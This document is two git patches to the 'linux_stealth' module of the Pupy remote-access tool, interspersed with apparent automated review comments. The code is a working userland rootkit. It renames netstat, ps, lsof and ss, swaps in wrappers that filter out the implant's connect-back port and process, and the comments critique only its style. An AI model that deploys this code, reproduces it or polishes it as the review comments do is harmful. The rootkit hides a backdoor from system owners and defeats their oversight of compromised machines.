From 649d91bb6043b221f405279550549bc4b0ccae42 Mon Sep 17 00:00:00 2001
From: j0eblack
Date: Wed, 2 Mar 2016 00:49:00 -0500
Subject: [PATCH 1/2] improved linux_stealth and added Demo video
---
 pupy/modules/linux_stealth.py | 35 +++++---------
 pupy/packages/linux/all/linux_stealth.py | 61 +++++++++++++-----------
 2 files changed, 45 insertions(+), 51 deletions(-)
diff --git a/pupy/modules/linux_stealth.py b/pupy/modules/linux_stealth.py
index cad3d1e4..7716ffa0 100644
--- a/pupy/modules/linux_stealth.py
+++ b/pupy/modules/linux_stealth.py
@@ -2,30 +2,19 @@
 from pupylib.PupyModule import *
 __class_name__="SetStealth"
+def print_callback(data):
+ sys.stdout.write(data)
+ sys.stdout.flush()
-@config(cat="manage", compat="unix")
 class SetStealth(PupyModule):
- """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
+ """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
 Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
-
-********************** /!\ WARNING /!\ **********************
-* Do NOT run the stealh module more than ONCE on a machine. *
-* Running it two times will brake the binaries. *
-*************************************************************
-NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
- def init_argparse(self):
- self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
- self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.')
+Demo: https://vimeo.com/157356150"""
+ def init_argparse(self):
+ self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
+ self.arg_parser.add_argument('--port', help='The port number to which Pupy is connecting to.')
- def is_compatible(self):
- a,r=super(SetStealth, self).is_compatible()
- if not a:
- return False, r
- if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
- return False, "It looks like this module has already been run on this machine."
- return True, ""
-
- def run(self, args):
- self.client.load_package("linux_stealth")
- self.client.conn.modules['linux_stealth'].run(str(args.port))
- self.success("Module executed successfully.")
+ def run(self, args):
+ self.client.load_package("linux_stealth")
+ self.client.conn.modules['linux_stealth'].run(args.port)
+ self.success("Module executed successfully.")
diff --git a/pupy/packages/linux/all/linux_stealth.py b/pupy/packages/linux/all/linux_stealth.py
index 94d04edd..c49546b6 100644
--- a/pupy/packages/linux/all/linux_stealth.py
+++ b/pupy/packages/linux/all/linux_stealth.py
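Review bot: `print_callback` is added at the top of the new side but nothing in this hunk calls it, and `sys` is not imported by any visible line of the module; it may arrive through the `from pupylib.PupyModule import *` star import, which this hunk does not show. Either drop the helper or add an explicit `import sys` beside the existing import so the name does not depend on what the star import happens to export. The second patch's hunk on this file keeps the helper and only re-indents it, so the same remark applies there. The class docstring still reads `runnin`; `running` is meant.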
@@ -1,36 +1,41 @@
 #!/usr/bin/env python
-import os
+import sys
 import subprocess
+import os
 import time
-def cmd_exists(cmd):
- return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
 def run(port):
- if cmd_exists("gcc") == True:
- bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
- #subprocess.call(bash, shell=True)
- with open('/tmp/b', 'w') as f:
- f.write(bash)
- os.system("bash /tmp/b")
- time.sleep(3)
- os.remove("/tmp/b")
- else:
- bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
- with open("/tmp/p", "w") as f:
- f.write(bash)
- os.system("bash /tmp/p")
- time.sleep(3)
- os.remove("/tmp/p")
- bashss="""#!/bin/bash
+ a=subprocess.check_output(["netstat", "-tn"])
+ if port in a:
+ def cmd_exists(cmd):
+ return subprocess.call("type " + cmd, shell=True,
+ stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
+ if cmd_exists("gcc") == True:
+ bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
+ with open('/tmp/b', 'w') as f:
+ f.write(bash)
+ f.close()
+ os.system("bash /tmp/b")
+ time.sleep(3)
+ os.remove("/tmp/b")
+ else:
+ bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
+ with open("/tmp/p", "w") as f:
+ f.write(bash)
+ f.close()
+ os.system("bash /tmp/p")
+ time.sleep(3)
+ os.remove("/tmp/p")
+ bashss="""#!/bin/bash
 /bin/zss $* | grep -v """+port
- get_ss_path=subprocess.check_output('which ss', shell=True)
- path=get_ss_path[:-3]
- os.system("mv "+path+"ss "+path+"zss")
- with open(path+"ss", "w") as newss:
- newss.write(bashss)
- os.system("chmod +x "+path+"ss")
-#blazo - fresh orange
-#brock - september 22nd
-#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
+ get_ss_path=subprocess.check_output('which ss', shell=True)
+ path=get_ss_path[:-3]
+ os.system("mv "+path+"ss "+path+"zss")
+ with open(path+"ss", "w") as newss:
+ newss.write(bashss)
+ newss.close()
+ os.system("chmod +x "+path+"ss")
+ else:
+ pass
From 746b58c220a21b38e654948a0b9bd8cd1c7ab8ae Mon Sep 17 00:00:00 2001
From: n1nj4sec
Date: Tue, 3 May 2016 18:07:05 +0200
Subject: [PATCH 2/2] linux stealth clean-up
---
 pupy/modules/linux_stealth.py | 23 ++++----
 pupy/packages/linux/all/linux_stealth.py | 73 +++++++++++++-----------
 2 files changed, 54 insertions(+), 42 deletions(-)
diff --git a/pupy/modules/linux_stealth.py b/pupy/modules/linux_stealth.py
index 7716ffa0..7033e44b 100644
--- a/pupy/modules/linux_stealth.py
+++ b/pupy/modules/linux_stealth.py
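Review bot: The `f.close()` and `newss.close()` calls added inside each `with open(...)` block are redundant: the context manager already closes the file when the block exits, so the new lines only restate what `with` guarantees and can be dropped. `if cmd_exists("gcc") == True:` compares a bool against `True`; the idiom is `if cmd_exists("gcc"):`. The trailing `else: pass` on `if port in a:` does nothing and can go as well. The whole of `run` lies within this hunk, and the second patch's hunk on the same file carries these lines forward unchanged.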
@@ -1,20 +1,23 @@
 #!/usr/bin/env python
 from pupylib.PupyModule import *
+from pupylib.utils.rpyc_utils import redirected_stdio
 __class_name__="SetStealth"
 def print_callback(data):
- sys.stdout.write(data)
- sys.stdout.flush()
+ sys.stdout.write(data)
+ sys.stdout.flush()
+@config(compat="linux", cat="manage")
 class SetStealth(PupyModule):
- """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
+ """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries.
 Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
 Demo: https://vimeo.com/157356150"""
- def init_argparse(self):
- self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
- self.arg_parser.add_argument('--port', help='The port number to which Pupy is connecting to.')
+ dependencies=["linux_stealth"]
+ def init_argparse(self):
+ self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
+ self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.')
- def run(self, args):
- self.client.load_package("linux_stealth")
- self.client.conn.modules['linux_stealth'].run(args.port)
- self.success("Module executed successfully.")
+ def run(self, args):
+ with redirected_stdio(self.client.conn):
+ self.client.conn.modules['linux_stealth'].run(args.port)
+ self.success("Module executed successfully.")
diff --git a/pupy/packages/linux/all/linux_stealth.py b/pupy/packages/linux/all/linux_stealth.py
index c49546b6..5fffa2bf 100644
--- a/pupy/packages/linux/all/linux_stealth.py
+++ b/pupy/packages/linux/all/linux_stealth.py
@@ -6,36 +6,45 @@
 import os
 import time
-def run(port):
- a=subprocess.check_output(["netstat", "-tn"])
- if port in a:
- def cmd_exists(cmd):
- return subprocess.call("type " + cmd, shell=True,
- stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
- if cmd_exists("gcc") == True:
- bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
- with open('/tmp/b', 'w') as f:
- f.write(bash)
- f.close()
- os.system("bash /tmp/b")
- time.sleep(3)
- os.remove("/tmp/b")
- else:
- bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
- with open("/tmp/p", "w") as f:
- f.write(bash)
- f.close()
- os.system("bash /tmp/p")
- time.sleep(3)
- os.remove("/tmp/p")
- bashss="""#!/bin/bash
+def run(port=None):
+ if port is None:
+ try:
+ import pupy
+ host, port=pupy.get_connect_back_host().split(":")
+ except:
+ raise Exception("pupy connect back port couldn't be found, please precise it manually")
+
+ print "hidding port %s ..."%port
+
+ a=subprocess.check_output(["netstat", "-tn"])
+ if port in a:
+ def cmd_exists(cmd):
+ return subprocess.call("type " + cmd, shell=True,
+ stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
+ if cmd_exists("gcc") == True:
+ bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
+ with open('/tmp/b', 'w') as f:
+ f.write(bash)
+ f.close()
+ os.system("bash /tmp/b")
+ time.sleep(3)
+ os.remove("/tmp/b")
+ else:
+ bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
+ with open("/tmp/p", "w") as f:
+ f.write(bash)
+ f.close()
+ os.system("bash /tmp/p")
+ time.sleep(3)
+ os.remove("/tmp/p")
+ bashss="""#!/bin/bash
 /bin/zss $* | grep -v """+port
- get_ss_path=subprocess.check_output('which ss', shell=True)
- path=get_ss_path[:-3]
- os.system("mv "+path+"ss "+path+"zss")
- with open(path+"ss", "w") as newss:
- newss.write(bashss)
- newss.close()
- os.system("chmod +x "+path+"ss")
- else:
- pass
+ get_ss_path=subprocess.check_output('which ss', shell=True)
+ path=get_ss_path[:-3]
+ os.system("mv "+path+"ss "+path+"zss")
+ with open(path+"ss", "w") as newss:
+ newss.write(bashss)
+ newss.close()
+ os.system("chmod +x "+path+"ss")
+ else:
+ print "port is already hidden"
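Review bot: The bare `except:` in the new `if port is None:` block catches everything, including `KeyboardInterrupt` and `SystemExit`, and the `raise Exception(...)` that follows discards the original error, so an absent `pupy` module and a malformed host string are reported identically. Narrow it to `except Exception:` so interpreter-level signals still propagate, and keep the cause visible, for instance `except Exception as e:` with `e` appended to the message. The text at `print "hidding port %s ..."%port` misspells `hiding`. `run` starts and ends within this hunk.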